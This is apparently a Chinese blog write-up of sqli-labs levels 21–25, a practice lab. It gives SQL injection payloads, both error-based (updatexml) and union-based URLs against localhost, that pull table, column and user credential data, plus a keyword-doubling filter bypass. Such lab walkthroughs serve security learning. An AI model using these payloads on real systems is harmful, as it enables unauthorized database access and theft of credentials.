标签:27% 25 group name less21 schema id concat sqlilabs
第21关
一.登录页面
二 .Burp Suite 抓包,进入重放器
三.查询数据库 先进行编码
')and updatexml(1,concat(1,database()),1)#
四.查表,先进行编码
')and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
五.查列,先进行编码
')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
六.查询users表中所有数据
')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#
第22关
一.登录页面
二 .Burp Suite 抓包,进入重放器
三.查询数据库 先进行编码
"and updatexml(1,concat(1,database()),1)#
四.查表,先进行编码
"and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
五.查列,先进行编码
"and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
六.查询users表中所有数据
"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#
第23关
一.看有无回显点
二查询数据库
http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271
http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271
三.查表
http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271
四.查列
http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271
第24关
使用二次注入
一.注册用户
二.admin的密码被修改为777777
第25关
一.闭合方式为 单引号 '
http://127.0.0.1/Less-25/?id=1%27%20--+http://127.0.0.1/Less-25/?id=1%27%20--+
二.查询数据库
http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+
三. 查询库中所有表
http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+
四.查询列
http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+
标签:27%,
25,
group,
name,
less21,
schema,
id,
concat,
sqlilabs
From: https://blog.csdn.net/m0_75036923/article/details/141434570